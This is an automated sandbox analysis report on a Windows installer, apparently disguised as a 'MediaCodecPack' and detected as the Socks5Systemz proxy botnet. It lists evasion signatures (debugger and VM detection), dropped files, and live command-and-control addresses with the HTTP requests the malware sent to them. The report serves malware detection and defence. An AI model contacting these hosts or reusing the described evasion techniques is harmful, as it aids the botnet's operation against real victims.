
Windows Analysis Report
Hbq580QZAR.exe

Overview

General Information

Sample name: Hbq580QZAR.exe (renamed because original name is a hash value)
Original sample name: 015bce2662bf644e819a99d3d2b0548b.exe
Analysis ID: 1577885
MD5: 015bce2662bf644e819a99d3d2b0548b
SHA1: cb27cb5da28a774e5590324b6062fc5953c09033
SHA256: d9ff5271da8e7ad2da78a2da803f4c2faed7c13da15700ce27547dc7c6529644
Tags: exe, user-abuse_ch

Detection

Socks5Systemz
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Multi AV Scanner detection for submitted file
Yara detected Socks5Systemz
AI detected suspicious sample
Contains functionality to infect the boot sector
Found API chain indicative of debugger detection
Machine Learning detection for dropped file
Tries to detect virtualization through RDTSC time measurements
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to launch a program with higher privileges
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to query network adapter information
Contains functionality to shutdown / reboot the system
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a DirectInput object (often for capturing keystrokes)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain (date check)
Found evasive API chain (may stop execution after checking a module file name)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains executable resources (Code or Archives)
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries disk information (often used to detect virtual machines)
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • Hbq580QZAR.exe (PID: 5588 cmdline: "C:\Users\user\Desktop\Hbq580QZAR.exe" MD5: 015BCE2662BF644E819A99D3D2B0548B)
    • Hbq580QZAR.tmp (PID: 1160 cmdline: "C:\Users\user\AppData\Local\Temp\is-LO4AE.tmp\Hbq580QZAR.tmp" /SL5="$1042E,3196748,56832,C:\Users\user\Desktop\Hbq580QZAR.exe" MD5: ED6A19AD054AD0172201AF725324781B)
      • mediacodecpack.exe (PID: 2216 cmdline: "C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe" -i MD5: ADAB835347D3F69415F7ED6C10C13B85)
  • cleanup
No configs have been found
Yara matches on dropped files

Source | Rule | Description | Author | Strings
C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\is-K5SAB.tmp | JoeSecurity_DelphiSystemParamCount | Detected Delphi use of System.ParamCount() | Joe Security
C:\ProgramData\MediaCodecPack\MediaCodecPack.exe | JoeSecurity_DelphiSystemParamCount | Detected Delphi use of System.ParamCount() | Joe Security
C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe | JoeSecurity_DelphiSystemParamCount | Detected Delphi use of System.ParamCount() | Joe Security

Yara matches on memory dumps

Source | Rule | Description | Author | Strings
00000003.00000002.2735668441.0000000002D41000.00000040.00001000.00020000.00000000.sdmp | JoeSecurity_Socks5Systemz | Yara detected Socks5Systemz | Joe Security
00000001.00000002.2736047862.0000000005A20000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_DelphiSystemParamCount | Detected Delphi use of System.ParamCount() | Joe Security
00000003.00000000.1493879108.0000000000401000.00000020.00000001.01000000.00000009.sdmp | JoeSecurity_DelphiSystemParamCount | Detected Delphi use of System.ParamCount() | Joe Security
00000003.00000002.2735509305.0000000002CA1000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Socks5Systemz | Yara detected Socks5Systemz | Joe Security
Process Memory Space: mediacodecpack.exe PID: 2216 | JoeSecurity_Socks5Systemz | Yara detected Socks5Systemz | Joe Security

Yara matches on unpacked PEs

Source | Rule | Description | Author | Strings
3.0.mediacodecpack.exe.400000.0.unpack | JoeSecurity_DelphiSystemParamCount | Detected Delphi use of System.ParamCount() | Joe Security

No Sigma rule has matched
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-12-18T21:09:00.658716+0100 | 2028765 | 3 | Unknown Traffic | 192.168.2.8 | 49708 | 188.119.66.185 | 443 | TCP
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-12-18T21:09:01.486334+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.8 | 49708 | 188.119.66.185 | 443 | TCP


                    AV Detection

Source: https://188.119.66.185/ai/?key=8f3f2b3ae514176a774cb0f2231e72eee7c4db7e40b82a8dcd6c946851e300888c325 | Avira URL Cloud: Label: malware
Source: https://188.119.66.185/ai/?key=8f3f2b3ae514176a774cb0f2231e72eee7c4db7e40b82a8dcd6c946851e300888c3250aa15d005633775b0e650f2ba1e9c95b1c92975ccf55bc592fe5a818ece02a1b7e2984c57cad7021dda36211bd63489 | Avira URL Cloud: Label: malware
Source: https://188.119.66.185/ai/?key=8f3f2b3ae514176a774cb0f2231e72eee7c4db7e40b92a8dcd6c946d4eb945839e7c4 | Avira URL Cloud: Label: malware
Source: https://188.119.66.185/ai/?key=8f3f2b3ae514176a774cb0f2231e72eee7c4db7e40b92a8dcd6c946d4eb945839e7c4ce71cc34f7f632ef3b70caaf94cda9ea6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad73589d6d79058 | Avira URL Cloud: Label: malware
Source: Hbq580QZAR.exe | ReversingLabs: Detection: 18%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 99.8% probability
Source: C:\ProgramData\MediaCodecPack\MediaCodecPack.exe | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\is-LO4AE.tmp\Hbq580QZAR.tmp | Code function: 1_2_0045D188 GetProcAddress,GetProcAddress,GetProcAddress,ISCryptGetVersion,1_2_0045D188
Source: C:\Users\user\AppData\Local\Temp\is-LO4AE.tmp\Hbq580QZAR.tmp | Code function: 1_2_0045D254 ArcFourCrypt,1_2_0045D254
Source: C:\Users\user\AppData\Local\Temp\is-LO4AE.tmp\Hbq580QZAR.tmp | Code function: 1_2_0045D23C ArcFourCrypt,1_2_0045D23C
Source: C:\Users\user\AppData\Local\Temp\is-LO4AE.tmp\Hbq580QZAR.tmp | Code function: 1_2_10001000 ISCryptGetVersion,1_2_10001000
Source: C:\Users\user\AppData\Local\Temp\is-LO4AE.tmp\Hbq580QZAR.tmp | Code function: 1_2_10001130 ArcFourCrypt,1_2_10001130

                    Compliance

Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe | Unpacked PE file: 3.2.mediacodecpack.exe.400000.0.unpack
Source: Hbq580QZAR.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
Source: C:\Users\user\AppData\Local\Temp\is-LO4AE.tmp\Hbq580QZAR.tmp | Registry value created: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MediaCodecPack_is1
Source: unknown | HTTPS traffic detected: 188.119.66.185:443 -> 192.168.2.8:49708 version: TLS 1.2
                    Source: Binary string: msvcp71.pdbx# source: is-FG1GT.tmp.1.dr
                    Source: Binary string: msvcr71.pdb< source: is-38DHO.tmp.1.dr
                    Source: Binary string: msvcp71.pdb source: is-FG1GT.tmp.1.dr
                    Source: Binary string: MicrosoftWindowsGdiPlus-1.0.2600.1360-gdiplus.pdb source: is-L8DJ5.tmp.1.dr
                    Source: Binary string: msvcr71.pdb source: is-38DHO.tmp.1.dr
Source: C:\Users\user\AppData\Local\Temp\is-LO4AE.tmp\Hbq580QZAR.tmp | Code function: 1_2_00452A60 FindFirstFileA,GetLastError,1_2_00452A60
Source: C:\Users\user\AppData\Local\Temp\is-LO4AE.tmp\Hbq580QZAR.tmp | Code function: 1_2_00474F88 FindFirstFileA,FindNextFileA,FindClose,1_2_00474F88
Source: C:\Users\user\AppData\Local\Temp\is-LO4AE.tmp\Hbq580QZAR.tmp | Code function: 1_2_004980A4 FindFirstFileA,SetFileAttributesA,FindNextFileA,FindClose,1_2_004980A4
Source: C:\Users\user\AppData\Local\Temp\is-LO4AE.tmp\Hbq580QZAR.tmp | Code function: 1_2_00464158 SetErrorMode,FindFirstFileA,FindNextFileA,FindClose,SetErrorMode,1_2_00464158
Source: C:\Users\user\AppData\Local\Temp\is-LO4AE.tmp\Hbq580QZAR.tmp | Code function: 1_2_00462750 FindFirstFileA,FindNextFileA,FindClose,1_2_00462750
Source: C:\Users\user\AppData\Local\Temp\is-LO4AE.tmp\Hbq580QZAR.tmp | Code function: 1_2_00463CDC SetErrorMode,FindFirstFileA,FindNextFileA,FindClose,SetErrorMode,1_2_00463CDC
Source: global traffic | TCP traffic: 192.168.2.8:49710 -> 31.214.157.206:2024
Source: Joe Sandbox View | IP Address: 31.214.157.206
Source: Joe Sandbox View | IP Address: 188.119.66.185
Source: Joe Sandbox View | JA3 fingerprint: 51c64c77e60f3980eea90869b68c58a8
Source: Network traffic | Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.8:49708 -> 188.119.66.185:443
Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.8:49796 -> 188.119.66.185:443
Source: global traffic | HTTP traffic detected:
  GET /ai/?key=8f3f2b3ae514176a774cb0f2231e72eee7c4db7e40b82a8dcd6c946851e300888c3250aa15d005633775b0e650f2ba1e9c95b1c92975ccf55bc592fe5a818ece02a1b7e2984c57cad7021dda36211bd63489 HTTP/1.1
  User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
  Host: 188.119.66.185
Source: global traffic | HTTP traffic detected:
  GET /ai/?key=8f3f2b3ae514176a774cb0f2231e72eee7c4db7e40b92a8dcd6c946d4eb945839e7c4ce71cc34f7f632ef3b70caaf94cda9ea6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad73589d6d79058 HTTP/1.1
  User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
  Host: 188.119.66.185
                    Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ae514176a774cb0f2231e72eee7c4db7e40b92a8dcd6c946d4eb945839e7c4ce71cc34f7f632ef3b70caaf94cda9ea6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad73589d6d79058 HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 188.119.66.185
                    Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ae514176a774cb0f2231e72eee7c4db7e40b92a8dcd6c946d4eb945839e7c4ce71cc34f7f632ef3b70caaf94cda9ea6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad73589d6d79058 HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 188.119.66.185
                    Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ae514176a774cb0f2231e72eee7c4db7e40b92a8dcd6c946d4eb945839e7c4ce71cc34f7f632ef3b70caaf94cda9ea6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad73589d6d79058 HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 188.119.66.185
                    Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ae514176a774cb0f2231e72eee7c4db7e40b92a8dcd6c946d4eb945839e7c4ce71cc34f7f632ef3b70caaf94cda9ea6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad73589d6d79058 HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 188.119.66.185
                    Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ae514176a774cb0f2231e72eee7c4db7e40b92a8dcd6c946d4eb945839e7c4ce71cc34f7f632ef3b70caaf94cda9ea6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad73589d6d79058 HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 188.119.66.185
                    Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ae514176a774cb0f2231e72eee7c4db7e40b92a8dcd6c946d4eb945839e7c4ce71cc34f7f632ef3b70caaf94cda9ea6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad73589d6d79058 HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 188.119.66.185
                    Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ae514176a774cb0f2231e72eee7c4db7e40b92a8dcd6c946d4eb945839e7c4ce71cc34f7f632ef3b70caaf94cda9ea6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad73589d6d79058 HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 188.119.66.185
                    Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ae514176a774cb0f2231e72eee7c4db7e40b92a8dcd6c946d4eb945839e7c4ce71cc34f7f632ef3b70caaf94cda9ea6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad73589d6d79058 HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 188.119.66.185
                    Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ae514176a774cb0f2231e72eee7c4db7e40b92a8dcd6c946d4eb945839e7c4ce71cc34f7f632ef3b70caaf94cda9ea6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad73589d6d79058 HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 188.119.66.185
                    Source: unknown | TCP traffic detected without corresponding DNS query: 188.119.66.185
                    Source: unknown | TCP traffic detected without corresponding DNS query: 31.214.157.206
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe | Code function: 3_2_02D42B95 WSASetLastError,WSARecv,WSASetLastError,select
                    Source: global traffic | HTTP traffic detected: GET /ai/?key=8f3f2b3ae514176a774cb0f2231e72eee7c4db7e40b82a8dcd6c946851e300888c3250aa15d005633775b0e650f2ba1e9c95b1c92975ccf55bc592fe5a818ece02a1b7e2984c57cad7021dda36211bd63489 HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US) | Host: 188.119.66.185
                    Source: Hbq580QZAR.tmp, 00000001.00000002.2736047862.0000000005AEC000.00000004.00001000.00020000.00000000.sdmp, mediacodecpack.exe, 00000003.00000000.1494194059.00000000004D2000.00000002.00000001.01000000.00000009.sdmp, MediaCodecPack.exe.3.dr, is-K5SAB.tmp.1.dr, mediacodecpack.exe.1.dr | String found in binary or memory: http://wonderwork.ucoz.com/
                    Source: Hbq580QZAR.tmp, Hbq580QZAR.tmp, 00000001.00000000.1481801382.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Hbq580QZAR.tmp.0.dr, is-TV2PJ.tmp.1.dr | String found in binary or memory: http://www.innosetup.com/
                    Source: Hbq580QZAR.exe | String found in binary or memory: http://www.jrsoftware.org/ishelp/index.php?topic=setupcmdline
                    Source: Hbq580QZAR.exe | String found in binary or memory: http://www.jrsoftware.org/ishelp/index.php?topic=setupcmdlineSetupU
                    Source: Hbq580QZAR.exe, 00000000.00000003.1481137225.0000000002300000.00000004.00001000.00020000.00000000.sdmp, Hbq580QZAR.exe, 00000000.00000003.1481298794.0000000002098000.00000004.00001000.00020000.00000000.sdmp, Hbq580QZAR.tmp, Hbq580QZAR.tmp, 00000001.00000000.1481801382.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Hbq580QZAR.tmp.0.dr, is-TV2PJ.tmp.1.dr | String found in binary or memory: http://www.remobjects.com/ps
                    Source: Hbq580QZAR.exe, 00000000.00000003.1481137225.0000000002300000.00000004.00001000.00020000.00000000.sdmp, Hbq580QZAR.exe, 00000000.00000003.1481298794.0000000002098000.00000004.00001000.00020000.00000000.sdmp, Hbq580QZAR.tmp, 00000001.00000000.1481801382.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Hbq580QZAR.tmp.0.dr, is-TV2PJ.tmp.1.dr | String found in binary or memory: http://www.remobjects.com/psU
                    Source: mediacodecpack.exe, 00000003.00000002.2733859980.00000000008E0000.00000004.00000020.00020000.00000000.sdmp, mediacodecpack.exe, 00000003.00000002.2736393238.0000000003385000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://188.119.66.185/
                    Source: mediacodecpack.exe, 00000003.00000002.2733859980.00000000008E0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://188.119.66.185/C
                    Source: mediacodecpack.exe, 00000003.00000002.2733859980.00000000008E0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://188.119.66.185/H
                    Source: mediacodecpack.exe, 00000003.00000002.2733859980.00000000008E0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://188.119.66.185/ai/?key=8f3f2b3ae514176a774cb0f2231e72eee7c4db7e40b82a8dcd6c946851e300888c325
                    Source: mediacodecpack.exe, 00000003.00000002.2736393238.000000000337D000.00000004.00000020.00020000.00000000.sdmp, mediacodecpack.exe, 00000003.00000002.2736393238.00000000033CD000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://188.119.66.185/ai/?key=8f3f2b3ae514176a774cb0f2231e72eee7c4db7e40b92a8dcd6c946d4eb945839e7c4
                    Source: mediacodecpack.exe, 00000003.00000002.2733859980.00000000008E0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://188.119.66.185/allowedCert_OS_1
                    Source: mediacodecpack.exe, 00000003.00000002.2733859980.00000000008E0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://188.119.66.185/d
                    Source: mediacodecpack.exe, 00000003.00000002.2733859980.00000000008E0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://188.119.66.185/en-GB
                    Source: mediacodecpack.exe, 00000003.00000002.2733859980.00000000008E0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://188.119.66.185/en-US
                    Source: mediacodecpack.exe, 00000003.00000002.2733859980.00000000008E0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://188.119.66.185/h
                    Source: mediacodecpack.exe, 00000003.00000002.2733859980.00000000008E0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://188.119.66.185/mCertificates
                    Source: mediacodecpack.exe, 00000003.00000002.2733859980.00000000008E0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://188.119.66.185/ography
                    Source: mediacodecpack.exe, 00000003.00000002.2733859980.00000000008E0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://188.119.66.185/p4
                    Source: mediacodecpack.exe, 00000003.00000002.2733859980.00000000008E0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://188.119.66.185/priseCertificates
                    Source: mediacodecpack.exe, 00000003.00000002.2733859980.00000000008E0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://188.119.66.185/rosoft
                    Source: mediacodecpack.exe, 00000003.00000002.2733859980.00000000008E0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://188.119.66.185/v
                    Source: mediacodecpack.exe, 00000003.00000002.2733859980.00000000008E0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://188.119.66.185/z
                    Source: Hbq580QZAR.exe, 00000000.00000003.1480741810.0000000002300000.00000004.00001000.00020000.00000000.sdmp, Hbq580QZAR.exe, 00000000.00000002.2734183284.0000000002091000.00000004.00001000.00020000.00000000.sdmp, Hbq580QZAR.exe, 00000000.00000003.1480816119.0000000002091000.00000004.00001000.00020000.00000000.sdmp, Hbq580QZAR.tmp, 00000001.00000002.2734658313.0000000002128000.00000004.00001000.00020000.00000000.sdmp, Hbq580QZAR.tmp, 00000001.00000002.2734157494.00000000005C1000.00000004.00000020.00020000.00000000.sdmp, Hbq580QZAR.tmp, 00000001.00000003.1482724370.00000000030F0000.00000004.00001000.00020000.00000000.sdmp, Hbq580QZAR.tmp, 00000001.00000003.1482802130.0000000002128000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://www.easycutstudio.com/support.html
                    Source: unknown | Network traffic detected: HTTP traffic on port 49708 -> 443
                    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49820
                    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49742
                    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49784
                    Source: unknown | Network traffic detected: HTTP traffic on port 49807 -> 443
                    Source: unknown | Network traffic detected: HTTP traffic on port 49799 -> 443
                    Source: unknown | Network traffic detected: HTTP traffic on port 49845 -> 443
                    Source: unknown | Network traffic detected: HTTP traffic on port 49736 -> 443
                    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49814
                    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49736
                    Source: unknown | Network traffic detected: HTTP traffic on port 49759 -> 443
                    Source: unknown | Network traffic detected: HTTP traffic on port 49753 -> 443
                    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49778
                    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49730
                    Source: unknown | Network traffic detected: HTTP traffic on port 49820 -> 443
                    Source: unknown | Network traffic detected: HTTP traffic on port 49711 -> 443
                    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49771
                    Source: unknown | Network traffic detected: HTTP traffic on port 49742 -> 443
                    Source: unknown | Network traffic detected: HTTP traffic on port 49724 -> 443
                    Source: unknown | Network traffic detected: HTTP traffic on port 49784 -> 443
                    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49807
                    Source: unknown | Network traffic detected: HTTP traffic on port 49714 -> 443
                    Source: unknown | Network traffic detected: HTTP traffic on port 49718 -> 443
                    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49724
                    Source: unknown | Network traffic detected: HTTP traffic on port 49790 -> 443
                    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49845
                    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49765
                    Source: unknown | Network traffic detected: HTTP traffic on port 49838 -> 443
                    Source: unknown | Network traffic detected: HTTP traffic on port 49712 -> 443
                    Source: unknown | Network traffic detected: HTTP traffic on port 49748 -> 443
                    Source: unknown | Network traffic detected: HTTP traffic on port 49831 -> 443
                    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49718
                    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49838
                    Source: unknown | Network traffic detected: HTTP traffic on port 49715 -> 443
                    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49716
                    Source: unknown | Network traffic detected: HTTP traffic on port 49778 -> 443
                    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49759
                    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49715
                    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49714
                    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49712
                    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49711
                    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49799
                    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49831
                    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49753
                    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49796
                    Source: unknown | Network traffic detected: HTTP traffic on port 49730 -> 443
                    Source: unknown | Network traffic detected: HTTP traffic on port 49814 -> 443
                    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49790
                    Source: unknown | Network traffic detected: HTTP traffic on port 49765 -> 443
                    Source: unknown | Network traffic detected: HTTP traffic on port 49796 -> 443
                    Source: unknown | Network traffic detected: HTTP traffic on port 49825 -> 443
                    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49708
                    Source: unknown | Network traffic detected: HTTP traffic on port 49716 -> 443
                    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49748
                    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49825
                    Source: unknown | Network traffic detected: HTTP traffic on port 49771 -> 443
                    Source: unknown | HTTPS traffic detected: 188.119.66.185:443 -> 192.168.2.8:49708 version: TLS 1.2
                    Source: is-L8DJ5.tmp.1.drBinary or memory string: DirectDrawCreateExmemstr_2baea9e2-c
                    Source: C:\Users\user\AppData\Local\Temp\is-LO4AE.tmp\Hbq580QZAR.tmpCode function: 1_2_0042F520 NtdllDefWindowProc_A,1_2_0042F520
                    Source: C:\Users\user\AppData\Local\Temp\is-LO4AE.tmp\Hbq580QZAR.tmpCode function: 1_2_00423B84 NtdllDefWindowProc_A,1_2_00423B84
                    Source: C:\Users\user\AppData\Local\Temp\is-LO4AE.tmp\Hbq580QZAR.tmpCode function: 1_2_004125D8 NtdllDefWindowProc_A,1_2_004125D8
                    Source: C:\Users\user\AppData\Local\Temp\is-LO4AE.tmp\Hbq580QZAR.tmpCode function: 1_2_00478AC0 NtdllDefWindowProc_A,1_2_00478AC0
                    Source: C:\Users\user\AppData\Local\Temp\is-LO4AE.tmp\Hbq580QZAR.tmpCode function: 1_2_00457594 PostMessageA,PostMessageA,SetForegroundWindow,NtdllDefWindowProc_A,1_2_00457594
                    Source: C:\Users\user\AppData\Local\Temp\is-LO4AE.tmp\Hbq580QZAR.tmpCode function: 1_2_0042E934: CreateFileA,DeviceIoControl,GetLastError,CloseHandle,SetLastError,1_2_0042E934
                    Source: C:\Users\user\Desktop\Hbq580QZAR.exeCode function: 0_2_00409448 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,0_2_00409448
                    Source: C:\Users\user\AppData\Local\Temp\is-LO4AE.tmp\Hbq580QZAR.tmpCode function: 1_2_004555E4 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,1_2_004555E4
                    Source: Joe Sandbox View | Dropped File: C:\ProgramData\MediaCodecPack\sqlite3.dll 16574F51785B0E2FC29C2C61477EB47BB39F714829999511DC8952B43AB17660
                    Source: Hbq580QZAR.tmp.0.dr | Static PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
                    Source: Hbq580QZAR.tmp.0.dr | Static PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                    Source: Hbq580QZAR.tmp.0.dr | Static PE information: Resource name: RT_VERSION type: 370 sysV pure executable not stripped
                    Source: is-TV2PJ.tmp.1.dr | Static PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
                    Source: is-TV2PJ.tmp.1.dr | Static PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                    Source: is-TV2PJ.tmp.1.dr | Static PE information: Resource name: RT_VERSION type: 370 sysV pure executable not stripped
                    Source: sqlite3.dll.3.dr | Static PE information: Number of sections : 19 > 10
                    Source: is-FD66D.tmp.1.dr | Static PE information: Number of sections : 19 > 10
                    Source: Hbq580QZAR.exe, 00000000.00000003.1481137225.0000000002300000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameshfolder.dll~/ vs Hbq580QZAR.exe
                    Source: Hbq580QZAR.exe, 00000000.00000003.1481298794.0000000002098000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameshfolder.dll~/ vs Hbq580QZAR.exe
                    Source: Hbq580QZAR.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                    Source: classification engine | Classification label: mal100.troj.evad.winEXE@5/26@0/2
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe | Code function: 3_2_02D4F8D0 _memset,FormatMessageA,GetLastError,FormatMessageA,GetLastError
                    Source: C:\Users\user\Desktop\Hbq580QZAR.exe | Code function: 0_2_00409448 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,ExitWindowsEx
                    Source: C:\Users\user\AppData\Local\Temp\is-LO4AE.tmp\Hbq580QZAR.tmp | Code function: 1_2_004555E4 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,ExitWindowsEx
